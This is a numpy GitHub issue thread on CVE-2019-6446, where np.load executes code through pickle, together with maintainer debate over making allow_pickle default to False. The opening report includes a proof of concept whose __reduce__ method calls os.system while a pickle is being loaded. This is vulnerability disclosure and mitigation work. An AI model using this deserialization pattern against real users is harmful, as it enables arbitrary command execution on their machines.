numpy load function with evil data will cause command execution

Created on 16 Jan 2019  ·  32 Comments  ·  Source: numpy/numpy

The numpy load function will execute commands when given malicious data. If an attacker shares malicious data on the internet,
loading it will cause command execution on the user's machine.

Reproducing code example:

import os
import pickle

import numpy
from numpy import __version__

print(__version__)


class Test(object):
    def __init__(self):
        self.a = 1

    def __reduce__(self):
        # pickle calls os.system('ls') when this object is unpickled
        return (os.system, ('ls',))


tmpdaa = Test()
with open("a-file.pickle", 'wb') as f:
    pickle.dump(tmpdaa, f)
# With allow_pickle defaulting to True (as in 1.14.6), this runs `ls`
numpy.load('a-file.pickle')

Numpy/Python version information:

1.14.6

Labels: 00 - Bug, 15 - Discussion, Documentation, good first issue

All 32 comments

It works on versions <= 1.16.0.

Yes, which is why the allow_pickle argument of np.load was added. Now I guess we could move to defaulting to False and give a readable message such as "use allow_pickle=True if you trust this file".

I agree that this would be the better default, so I am open to pushing that deprecation, even if it is unfortunately a bit noisy e.g. for all those scientists just sharing some data in the lab (or just saving/reloading themselves).

allow_pickle was added in April 2015, so it would seem that it should have existed since numpy 1.10. So I think that move does get more realistic now, since I doubt many using/supporting 1.17 will also still support 1.10 (removing the pain of supporting the kwarg or not supporting it). Although for the moment it seems scipy at least still supports 1.8 in version 1.

It seems this will last for a long time.

I would suggest logging a deprecation warning and giving a date if you want a smooth transition.

@Plazmaz of course, I would go with a VisibleDeprecationWarning, if we want casual users to stop doing it. Then deprecate after one or two releases. The thing is that it is annoying to work around if you have to and the kwarg does not exist in some older versions. Because then you have to do if np.__version__ > ...: use kwarg else do not use kwarg to avoid the warning and support both.
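
As a rough illustration of the workaround described above, here is a minimal sketch that passes the kwarg only when the installed np.load accepts it. The helper name load_compat is hypothetical, and it inspects the function signature rather than comparing version strings, which is an assumption about how one might do this, not something proposed in this thread.

```python
import inspect
import io

import numpy as np


def load_compat(file, allow_pickle=False, **kwargs):
    """Hypothetical helper: forward allow_pickle only if np.load knows it."""
    if "allow_pickle" in inspect.signature(np.load).parameters:
        return np.load(file, allow_pickle=allow_pickle, **kwargs)
    # Older NumPy without the kwarg: fall back to the plain call.
    return np.load(file, **kwargs)


# Round-trip a plain numeric array through an in-memory buffer.
buf = io.BytesIO()
np.save(buf, np.arange(3))
buf.seek(0)
arr = load_compat(buf)
```

Checking the signature avoids the pitfalls of comparing version strings, but it still means every caller that wants to support both old and new releases has to carry a shim like this.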

Anyway, I think there is a good chance you can get it into 1.17. So if you feel like it, open a PR, but we may want to ping the mailing list to see if someone complains.

Hi, Fedora numpy RPM maintainer. What's a good way to mitigate this in distro packaging?

I do not know of a nice way. Depending on the concern level, I would be up to adding a warning very soon, so that it is definitely there in 1.17. If someone is extremely concerned, we could discuss backporting it or moving quicker, but that would depend a lot on whether or not downstream depends on it.

I am working on this.

cc @jeanqasaur re: security / vulnerability expertise

> Hi, Fedora numpy RPM maintainer. What's a good way to mitigate this in distro packaging?

@limburgher: what does fedora do about the exact same functionality built into Python? It's not clear that this is something that needs mitigating.

While I'm not opposed to changing the default, it seems wrong to declare this a vulnerability. It's working as documented and designed.

Unfortunately the rule is that once a CVE number is assigned, it no longer matters whether there is any bug or not, the distros have to try to do something to prove to their customers that they are Providing Value. Not sure what that would be here, but companies and ops people are always struggling to manage the ongoing flood of vulnerabilities, and the tools they use to do this don't have a lot of room for communicating nuance, so that's the way the pressure goes. We don't have customers though, so we shouldn't necessarily take that into account ourselves.

We can tell during save and load whether a particular file uses pickle or not, right? It probably is good to migrate to allow_pickle=False in both cases, with an intermediate period where we issue some kind of deprecation warning exactly in the cases where save or load actually does need to use pickle and allow_pickle wasn't specified.

@eric-wieser The difference from the stdlib pickle is that load/save actually can avoid using pickle in most cases (e.g. simple arrays of primitive types); pickle only gets used in more exotic cases like object arrays or IIRC certain complicated dtypes. This makes it possible for folks who are mostly using the safe case to miss that the unsafe case exists, if they don't read the docs closely enough. And anyway, given that we have both a "safe mode" and an "unsafe mode", it's better for the "safe mode" to be the default. For stdlib pickle OTOH, it's always 100% unsafe 100% of the time so there's no point in worrying about defaults.
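
A small sketch of the safe and unsafe cases described above, using in-memory buffers. The helper name roundtrip is made up for illustration: a numeric array loads fine with allow_pickle=False, while an object array is refused with a ValueError.

```python
import io

import numpy as np


def roundtrip(arr):
    """Save to an in-memory buffer, then load with pickle disallowed."""
    buf = io.BytesIO()
    np.save(buf, arr)  # np.save only falls back to pickle for object data
    buf.seek(0)
    return np.load(buf, allow_pickle=False)


# Primitive dtype: stored as raw bytes plus a header, no pickle involved.
numeric = roundtrip(np.arange(5, dtype=np.int64))

# Object dtype: needs pickle, so loading with allow_pickle=False fails.
try:
    roundtrip(np.array([{"a": 1}, None], dtype=object))
    object_array_loaded = True
except ValueError:
    object_array_loaded = False
```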

Honestly, if it's documented, intentional functionality, I can close the BZ in good conscience, especially if safe is the default. I don't know how we handle Python's functionality. I'll look.

From my examination of the spec, I don't think we alter anything from upstream in that regard.

Has the CVE been disputed? That might make the scenario clearer to maintainers.

The CVE appears largely bogus. That numpy.load can execute arbitrary code is well known and documented, and it is necessary for loading serialized Python object arrays. The user can forbid loading object arrays by passing allow_pickle=False to this library function.

It would have been better if the default had been to load object arrays only when explicitly asked, but it is as it is for historical reasons. The transition has also been suggested before, and the discussion above is about how to make it in a way that does not uncontrollably break backward compatibility.

Careless use of numpy.load, like careless use of Python pickling, can however lead to vulnerabilities in downstream applications.

> That numpy.load can execute arbitrary code is well known and documented, and it is necessary for loading serialized Python object arrays.

I would rather only say that it is documented. I've been using numpy for a few years, and while I'm not a frequent user of numpy.save/numpy.load it wasn't obvious to me at all that numpy.load suffers from the same vulnerability as pickle does. Of course I didn't know that numpy.load might use pickle under the hood (I only use numpy-native arrays and never gave it a thought, exactly the scenario that @njsmith mentioned).

The fact that pickle is vulnerable is well-known, and its documentation has a big red warning on top saying

Warning: The pickle module is not secure against erroneous or maliciously constructed data. Never unpickle data received from an untrusted or unauthenticated source.

In comparison, the docs of numpy.load seem to mention the whole security aspect as an aside in the description of its allow_pickle keyword:

allow_pickle : bool, optional
    Allow loading pickled object arrays stored in npy files. Reasons for disallowing pickles include security, as loading pickled data can execute arbitrary code. If pickles are disallowed, loading object arrays will fail. Default: True

I wouldn't hate it if we could put a Big Red Warning into the documentation of numpy.load, at least until allow_pickle=False becomes the default. Until that change is made, seeing numpy.load should raise the same red flags in one's mind that pickle.load raises.

Documentation PR welcome for numpy.load

Documentation now has a warning about pickle

> Unfortunately the rule is that once a CVE number is assigned, it no longer matters whether there is any bug or not, the distros have to try to do something to prove to their customers that they are Providing Value. Not sure what that would be here, but companies and ops people are always struggling to manage the ongoing flood of vulnerabilities, and the tools they use to do this don't have a lot of room for communicating nuance, so that's the way the pressure goes.

@njsmith it is not so bad: we will make numpy.load default to allow_pickle=False, which is actually not a completely stupid idea.

The only risk I see with that is any project that doesn't explicitly set allow_pickle will break.

It's not just end-user projects we have to worry about - I'm worried about downstream libraries providing mylib.load that wraps np.load. These will start failing to load object arrays. One of three things will happen with them:

  • They remain abandoned, and will never work on object arrays in the way they used to. Users will find their data is held hostage, and have to downgrade numpy to recover it.
  • They re-release setting allow_pickle=True to resume the old behavior - which is the downstream libraries indicating that they think this isn't an attack vector they care about. This still costs them an incompatible release
  • They will expose allow_pickle=False in their own API, pushing the problem downstream.
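
To make the third outcome concrete, here is a minimal sketch of a downstream wrapper that exposes the flag in its own API. The name mylib_load is hypothetical and stands in for the mylib.load mentioned above.

```python
import io

import numpy as np


def mylib_load(file, allow_pickle=False):
    """Hypothetical downstream wrapper that forwards the caller's choice."""
    return np.load(file, allow_pickle=allow_pickle)


# A user with an existing object array must now opt in explicitly.
buf = io.BytesIO()
np.save(buf, np.array([{"a": 1}, "text"], dtype=object))
buf.seek(0)
restored = mylib_load(buf, allow_pickle=True)
```

The data stays recoverable, but every caller of the wrapper now has to make the same security decision that np.load asks for.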

My preference would be:

  • Do nothing to np.save. Having a long-running script crash at the end while saving an object array is an awful experience.
  • Change the default in np.load to None. Detect the user not passing in True or False explicitly, and emit a UserWarning explaining the dangers, asking them to choose between security (False) and object array support (True). Default to the status quo after emitting this warning. It's my understanding that the problem here is lack of awareness. Neither choice is correct in all cases, so I don't think we should suddenly change our minds about the default without warning.
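
The None-default proposal can be sketched as a wrapper around np.load. This is only an illustration of the idea under the assumptions stated in the comments, not NumPy's implementation; load_with_warning is a made-up name, and the fallback to True reflects the default at the time of this discussion.

```python
import io
import warnings

import numpy as np


def load_with_warning(file, allow_pickle=None, **kwargs):
    """Hypothetical wrapper: warn when allow_pickle is left unspecified."""
    if allow_pickle is None:
        # Warn before touching the file, then keep the status quo.
        warnings.warn(
            "allow_pickle was not set explicitly. Pass allow_pickle=False "
            "for untrusted files, or allow_pickle=True if you need object "
            "arrays and trust the source.",
            UserWarning,
            stacklevel=2,
        )
        allow_pickle = True  # assumed status quo (the default back then)
    return np.load(file, allow_pickle=allow_pickle, **kwargs)


buf = io.BytesIO()
np.save(buf, np.arange(3))
buf.seek(0)
with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")
    arr = load_with_warning(buf)
```

Passing True or False explicitly skips the warning, which is how a caller records that the choice was deliberate.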

@eric-wieser good point about the pain of a script crashing. I would be up for giving a UserWarning by default.

The question is what we want to do in the long run in load. I am not sure I like forcing everyone to use the kwarg (to silence the warning), when the array is safe. Although it does have the merit of no danger of locking someone out of their data... OTOH, if the warning only shows up on "unsafe" load, it may be too late. Right now I think I have a slight preference for making the transition period rather a bit longer.

> OTOH, if the warning only shows up on "unsafe" load, it may be too late.

Either:

  • The library/script already exists and is published - anything we do is already too late
  • The library/script is still being developed. The developer should see the warning during local testing on a safe file, and should be able to make an informed decision about which behavior they want. For this reason, we should emit the warning even if the array is safe (and probably before loading it, just in case they have the python equivalent of -Werror set).
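
The -Werror remark can be illustrated without NumPy: when warnings are promoted to errors, warnings.warn raises instead of printing, so anything placed after the call never runs. The function name below is hypothetical.

```python
import warnings


def load_like_function():
    """Stand-in for a loader that warns before doing any work."""
    warnings.warn("allow_pickle was not set explicitly", UserWarning)
    return "loaded"


with warnings.catch_warnings():
    # Equivalent in effect to running Python with -W error.
    warnings.simplefilter("error")
    try:
        load_like_function()
        raised = False
    except UserWarning:
        raised = True
```

Emitting the warning before loading means such a developer gets the error before any potentially unsafe unpickling takes place.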

Yes, I definitely agree for libraries, but I think it may be a bit annoying for the vast number of shorter scripts.

> Change the default in np.load to None. Detect the user not passing in True or False explicitly, and emit a UserWarning explaining the dangers, asking them to choose between security (False) and object array support (True). Default to the status quo after emitting this warning. It's my understanding that the problem here is lack of awareness. Neither choice is correct in all cases, so I don't think we should suddenly change our minds about the default without warning.

This sounds super annoying though. Most people (I believe) don't save/load object arrays. And the worst case if someone misses the warning is (eventually) their script crashes when loading, the data is still safe on disk, and they retry with the allow_pickle flag.

Is it beyond the responsibility of numpy to try loading safely first and only shouting in case that fails due to object arrays? That would remove extra work for most (non-objecty) use cases, but I guess that would also reduce visibility of the whole security issue. Then again I think "users should be made very aware" and "users should not be inconvenienced" are somewhat contradictory goals here.
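
A sketch of what "try safely first, shout only on failure" might look like from user code. The helper load_safely_first is hypothetical; note that np.load can raise ValueError for other reasons too, so the message is deliberately hedged.

```python
import os
import tempfile

import numpy as np


def load_safely_first(path):
    """Hypothetical helper: use the pickle-free path, explain if it fails."""
    try:
        return np.load(path, allow_pickle=False)
    except ValueError as exc:
        # ValueError is not exclusive to object arrays, hence the "if".
        raise ValueError(
            "Could not load %r without pickle. If it holds object arrays "
            "and you trust its source, retry with allow_pickle=True." % path
        ) from exc


with tempfile.TemporaryDirectory() as tmp:
    plain_path = os.path.join(tmp, "plain.npy")
    object_path = os.path.join(tmp, "objects.npy")
    np.save(plain_path, np.arange(4))
    np.save(object_path, np.array([None, "x"], dtype=object))

    plain = load_safely_first(plain_path)  # numeric data loads quietly
    try:
        load_safely_first(object_path)
        refused = False
    except ValueError:
        refused = True
```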

> Change the default in np.load to None. Detect the user not passing in True or False explicitly, and emit a UserWarning explaining the dangers, asking them to choose between security (False) and object array support (True). Default to the status quo after emitting this warning. It's my understanding that the problem here is lack of awareness. Neither choice is correct in all cases, so I don't think we should suddenly change our minds about the default without warning.

What about this patch:

--- a/numpy/lib/npyio.py
+++ b/numpy/lib/npyio.py
@@ -265,7 +265,7 @@ class NpzFile(object):
         return self.files.__contains__(key)


-def load(file, mmap_mode=None, allow_pickle=True, fix_imports=True,
+def load(file, mmap_mode=None, allow_pickle=None, fix_imports=True,
          encoding='ASCII'):
     """
     Load arrays or pickled objects from ``.npy``, ``.npz`` or pickled files.
@@ -367,6 +367,16 @@ def load(file, mmap_mode=None, allow_pic
     memmap([4, 5, 6])

     """
+
+    if allow_pickle is None:
+        UserWarning("""
+        numpy.load() run without explicit setting allow_pickle option.
+        If you are not completely certain about security of the pickled
+        data, you are strongly encouraged to set allow_pickle to False,
+        otherwise you can set it to True.
+        """)
+        allow_pickle = False
+
     own_fid = False
     if isinstance(file, basestring):
         fid = open(file, "rb")
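
One detail worth noting about the patch as written: UserWarning(...) on its own only constructs an exception object, so no warning would reach the user; warnings.warn is what actually issues one. The patch also sets allow_pickle to False, whereas the quoted proposal suggested keeping the status quo after warning. A minimal illustration of the first point, independent of NumPy:

```python
import warnings

with warnings.catch_warnings(record=True) as caught:
    warnings.simplefilter("always")

    # Builds an exception instance and discards it; nothing is emitted.
    UserWarning("constructed only")
    count_after_construct = len(caught)

    # Actually issues the warning through the warnings machinery.
    warnings.warn("emitted", UserWarning)
    count_after_warn = len(caught)
```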

I am still in favor of a warning when loading object data. It can be a bit "too late", but makes for a much less noisy transition. We could add a warning when saving (just a permanent warning). There is an open PR which I hope will transform into something more like that. If you want to spend time on it, we are generally happy about PRs.
It seems to me that it is converging towards starting a deprecation cycle soon in any case, and I think that will happen (but it will be sooner if someone picks it up ;)). There may be a small chance of a request to delay, but I doubt it, and it is hard to know without trying.

Could you please close this issue? It is referenced in https://nvd.nist.gov/vuln/detail/CVE-2019-6446, because of which Nexus IQ still considers it vulnerable.

thanks @Manjunath07
